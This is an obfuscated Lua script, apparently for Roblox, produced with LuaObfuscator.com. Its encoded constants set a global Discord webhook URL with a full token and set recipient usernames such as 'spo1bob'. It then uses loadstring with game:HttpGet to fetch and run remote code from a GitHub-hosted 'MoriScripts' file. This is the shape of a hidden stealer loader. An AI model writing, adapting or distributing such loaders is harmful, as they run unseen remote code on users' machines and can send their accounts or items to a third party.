--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v94=0;local v95;while true do if (v94==1) then return v95;end if (v94==0) then v95=v5(v82,v19);v19=nil;v94=1;end end else return v82;end end end);local function v20(v31,v32,v33)if v33 then local v83=0 -0 ;local v84;while true do if (v83==(0 -0)) then v84=(v31/((3 -1)^(v32-1)))%((4 -2)^(((v33-(1 + 0)) -(v32-(620 -(555 + 64)))) + (1066 -((162 -94) + 997)))) ;return v84-(v84%(932 -(857 + 74))) ;end end else local v85=0;local v86;while true do if (v85==(568 -((677 -310) + 201))) then v86=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v86 + v86))>=v86) and ((1 -0) + 0)) or ((350 -(87 + 263)) + 0) ;end end end end local function v21()local v34=180 -(67 + 113) ;local v35;while true do if (v34==(1 + 0)) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + (3 -2) + 0 ;v34=953 -(802 + 150) ;end end end local function v22()local v36=0 -0 ;local v37;local v38;while true do if (v36==(1 + 0 + 0)) then return (v38 * (689 -433)) + v37 ;end if (v36==(0 -0)) then v37,v38=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (4 -2) ;v36=998 -(915 + 82) ;end end end local function v23()local v39,v40,v41,v42=v1(v16,v18,v18 + (4 -1) );v18=v18 + 4 + (0 -0) ;return (v42 * (16778007 -((810 -(416 + 26)) + 423))) + (v41 * (205958 -140422)) + (v40 * ((874 -600) -(10 + 8))) + v39 ;end local function v24()local v43=v23();local v44=v23();local v45=1 + 0 ;local v46=(v20(v44,1 -0 ,458 -((1225 -(1020 + 60)) + 293) ) * (2^(462 -(44 + 386)))) + v43 ;local v47=v20(v44,1507 -(998 + 488) ,10 + 21 );local v48=((v20(v44,32)==(1 + 0)) and  -((2196 -(630 + 793)) -(201 + 571))) or 1 ;if (v47==((3856 -2718) -(116 + (4838 -3816)))) then if (v46==(0 -0)) then return v48 * (0 + 0) ;else v47=1 + (0 -0) ;v45=0 -(1747 -(760 + 987)) ;end elseif (v47==((9182 -(1789 + 124)) -5222)) then return ((v46==((1625 -(745 + 21)) -(814 + 45))) and (v48 * ((2 -1)/(0 + 0)))) or (v48 * NaN) ;end return v8(v48,v47-(362 + 661) ) * (v45 + (v46/((887 -(261 + 624))^(92 -40)))) ;end local function v25(v49)local v50;if  not v49 then local v87=0 + 0 + 0 ;while true do if ((0 -(1055 -(87 + 968)))==v87) then v49=v23();if (v49==(0 -0)) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -(1 + 0) );v18=v18 + v49 ;local v51={};for v66=1, #v50 do v51[v66]=v2(v1(v3(v50,v66,v66)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 + 0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (2~=v52) then else local v91=0;while true do if (v91==0) then v57=nil;v58=nil;v91=2 -1 ;end if (v91==(2 -1)) then v52=3;break;end end end if (v52==(1903 -(106 + 1794))) then v59=nil;while true do local v96=0;local v97;local v98;while true do if (0==v96) then v97=0;v98=nil;v96=1 + 0 ;end if (v96~=1) then else while true do if (v97==0) then v98=0 + 0 ;while true do if (v98==0) then local v144=0 -0 ;while true do if (v144~=1) then else v98=2 -1 ;break;end if (v144==0) then local v155=0;while true do if (v155==1) then v144=1;break;end if (v155==(114 -(4 + 110))) then if (v53~=(586 -(57 + 527))) then else local v159=0;local v160;while true do if (v159==(1427 -(41 + 1386))) then v160=0;while true do if (v160~=(103 -(17 + 86))) then else for v169=1 + 0 ,v58 do local v170=0;local v171;local v172;local v173;while true do if (v170==(1 -0)) then v173=nil;while true do if (v171~=(0 -0)) then else local v181=166 -(122 + 44) ;while true do if (v181==0) then v172=v21();v173=nil;v181=1 -0 ;end if (v181==(3 -2)) then v171=1;break;end end end if (v171==1) then if (v172==(1 + 0)) then v173=v21()~=(0 + 0) ;elseif (v172==2) then v173=v24();elseif (v172~=(5 -2)) then else v173=v25();end v59[v169]=v173;break;end end break;end if (v170~=0) then else v171=0;v172=nil;v170=66 -(30 + 35) ;end end end v57[3]=v21();v160=1;end if (v160==(1 + 0)) then for v174=1258 -(1043 + 214) ,v23() do local v175=0;local v176;local v177;while true do if (v175~=0) then else local v178=0 -0 ;local v179;while true do if (v178~=(1212 -(323 + 889))) then else v179=0 -0 ;while true do if (v179~=1) then else v175=581 -(361 + 219) ;break;end if (v179==0) then local v188=320 -(53 + 267) ;while true do if (v188==(1 + 0)) then v179=1;break;end if (v188~=(413 -(15 + 398))) then else v176=982 -(18 + 964) ;v177=nil;v188=1;end end end end break;end end end if (1==v175) then while true do if (v176==(0 -0)) then v177=v21();if (v20(v177,1,1)==0) then local v183=0 + 0 ;local v184;local v185;local v186;local v187;while true do if (v183~=(0 + 0)) then else local v189=0;while true do if (v189==0) then v184=0;v185=nil;v189=1;end if ((851 -(20 + 830))==v189) then v183=1 + 0 ;break;end end end if (v183==(128 -(116 + 10))) then while true do if (v184==2) then local v191=0 + 0 ;local v192;while true do if (v191==(738 -(542 + 196))) then v192=0;while true do if (v192~=1) then else v184=6 -3 ;break;end if (v192~=0) then else if (v20(v186,1 + 0 ,1)==1) then v187[2 + 0 ]=v59[v187[1 + 1 ]];end if (v20(v186,4 -2 ,4 -2 )~=(1552 -(1126 + 425))) then else v187[408 -(118 + 287) ]=v59[v187[11 -8 ]];end v192=1122 -(118 + 1003) ;end end break;end end end if (v184~=1) then else local v193=0;while true do if ((0 -0)==v193) then v187={v22(),v22(),nil,nil};if (v185==(0 + 0)) then local v199=0;local v200;local v201;local v202;while true do if (v199==(977 -(553 + 424))) then v200=0 -0 ;v201=nil;v199=1;end if (v199==(1 + 0)) then v202=nil;while true do if (v200==(0 + 0)) then local v210=0 + 0 ;while true do if (v210==0) then v201=0 + 0 ;v202=nil;v210=1;end if (v210~=(1 + 0)) then else v200=1;break;end end end if ((2 -1)==v200) then while true do if (v201==(0 -0)) then v202=0;while true do if (v202~=(0 -0)) then else v187[1 + 2 ]=v22();v187[4]=v22();break;end end break;end end break;end end break;end end elseif (v185==(4 -3)) then v187[3]=v23();elseif (v185==2) then v187[756 -(239 + 514) ]=v23() -(2^16) ;elseif (v185==3) then local v211=0 + 0 ;local v212;while true do if (0==v211) then v212=1329 -(797 + 532) ;while true do if (v212~=0) then else v187[3 + 0 ]=v23() -((1 + 1)^(37 -21)) ;v187[4]=v22();break;end end break;end end end v193=1;end if (v193==1) then v184=1204 -(373 + 829) ;break;end end end if (v184~=3) then else if (v20(v186,3,734 -(476 + 255) )==(1131 -(369 + 761))) then v187[4]=v59[v187[3 + 1 ]];end v54[v174]=v187;break;end if (v184~=0) then else local v195=0 -0 ;local v196;while true do if (v195==0) then v196=0 -0 ;while true do if ((239 -(64 + 174))==v196) then v184=1;break;end if (v196==0) then local v203=0;while true do if (v203==(0 + 0)) then v185=v20(v177,2,3 -0 );v186=v20(v177,4,342 -(144 + 192) );v203=1;end if (v203==(217 -(42 + 174))) then v196=1 + 0 ;break;end end end end break;end end end end break;end if (v183~=(1 + 0)) then else local v190=0 + 0 ;while true do if (v190~=0) then else v186=nil;v187=nil;v190=1505 -(363 + 1141) ;end if (v190~=(1581 -(1183 + 397))) then else v183=2;break;end end end end end break;end end break;end end end v53=8 -5 ;break;end end break;end end end if (v53==(1 + 0)) then local v161=0 + 0 ;local v162;while true do if (v161~=(1975 -(1913 + 62))) then else v162=0;while true do if (v162==(0 + 0)) then local v167=0 -0 ;local v168;while true do if (v167~=0) then else v168=1933 -(565 + 1368) ;while true do if (v168==0) then local v180=0;while true do if (v180==1) then v168=3 -2 ;break;end if (v180==(1661 -(1477 + 184))) then v57={v54,v55,nil,v56};v58=v23();v180=1 -0 ;end end end if (v168==(2 -1)) then v162=1;break;end end break;end end end if (v162~=1) then else v59={};v53=306 -(244 + 60) ;break;end end break;end end end v155=1 + 0 ;end end end end end if ((477 -(41 + 435))~=v98) then else if (v53==(1004 -(938 + 63))) then local v147=0;local v148;while true do if (v147==0) then v148=0 + 0 ;while true do if (v148==(1125 -(936 + 189))) then local v163=0 + 0 ;while true do if ((1613 -(1565 + 48))==v163) then for v164=1 + 0 ,v23() do v55[v164-(1139 -(782 + 356)) ]=v28();end return v57;end end end end break;end end end if (v53==(267 -(176 + 91))) then local v149=0;while true do if (v149==1) then v56={};v53=2 -1 ;break;end if (v149~=0) then else local v158=0;while true do if (v158==(0 -0)) then v54={};v55={};v158=1093 -(975 + 117) ;end if (v158~=1) then else v149=1876 -(157 + 1718) ;break;end end end end end break;end end break;end end break;end end end break;end if ((0 + 0)==v52) then local v92=0;while true do if (v92==(0 -0)) then v53=0;v54=nil;v92=1;end if ((3 -2)~=v92) then else v52=1019 -(697 + 321) ;break;end end end if (v52~=(2 -1)) then else local v93=0;while true do if (v93~=1) then else v52=3 -1 ;break;end if (v93==0) then v55=nil;v56=nil;v93=1;end end end end end local function v29(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v68=v63;local v69=v64;local v70=v65;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v88=0,v76 do if (v88>=v70) then v74[v88-v70 ]=v75[v88 + 1 ];else v78[v88]=v75[v88 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=10) then if (v81<=4) then if (v81<=1) then if (v81==0) then local v103=v80[2];v78[v103]=v78[v103](v13(v78,v103 + 1 ,v73));else local v105=v80[2];v78[v105]=v78[v105](v13(v78,v105 + 1 ,v73));end elseif (v81<=2) then v78[v80[2]]=v62[v80[3]];elseif (v81==3) then v78[v80[2]]();else v78[v80[2]]=v80[3];end elseif (v81<=7) then if (v81<=5) then do return;end elseif (v81==6) then v78[v80[2]]();else local v121=0;local v122;local v123;while true do if (v121==0) then v122=v80[2];v123=v78[v80[3]];v121=1;end if (v121==1) then v78[v122 + 1 ]=v123;v78[v122]=v123[v80[4]];break;end end end elseif (v81<=8) then v72=v80[3];elseif (v81>9) then v78[v80[2]][v80[3]]=v80[4];else v72=v80[3];end elseif (v81<=15) then if (v81<=12) then if (v81>11) then v78[v80[2]]=v80[3]~=0 ;elseif (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81<=13) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81>14) then v78[v80[2]]=v80[3];else local v131=v80[2];local v132,v133=v71(v78[v131](v13(v78,v131 + 1 ,v80[3])));v73=(v133 + v131) -1 ;local v134=0;for v145=v131,v73 do local v146=0;while true do if (v146==0) then v134=v134 + 1 ;v78[v145]=v132[v134];break;end end end end elseif (v81<=18) then if (v81<=16) then v78[v80[2]]=v80[3]~=0 ;elseif (v81>17) then local v135=v80[2];local v136=v78[v80[3]];v78[v135 + 1 ]=v136;v78[v135]=v136[v80[4]];else v78[v80[2]]=v62[v80[3]];end elseif (v81<=19) then local v112=v80[2];local v113,v114=v71(v78[v112](v13(v78,v112 + 1 ,v80[3])));v73=(v114 + v112) -1 ;local v115=0;for v116=v112,v73 do v115=v115 + 1 ;v78[v116]=v113[v115];end elseif (v81==20) then do return;end else v78[v80[2]][v80[3]]=v80[4];end v72=v72 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O3139363738363731303833352O343637362F624567577A644A5A364F4B794B46377038767749396641354B4D4450334B445F746845447771534B7159786C774758467572507A647863334D4C4A3249582D6B48716459030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D6503073O0073706F31626F6203093O00557365724E616D653200173O00120F3O00013O00260B3O000E000100020004093O000E0001001202000100033O00300A000100040005001202000100063O001202000200073O00201200020002000800120F000400094O000C000500014O0013000200054O000100013O00022O00060001000100010004093O0016000100260B3O0001000100010004093O00010001001202000100033O00300A0001000A000B001202000100033O00300A0001000C000B00120F3O00023O0004093O000100012O00143O00017O00",v9(),...);end
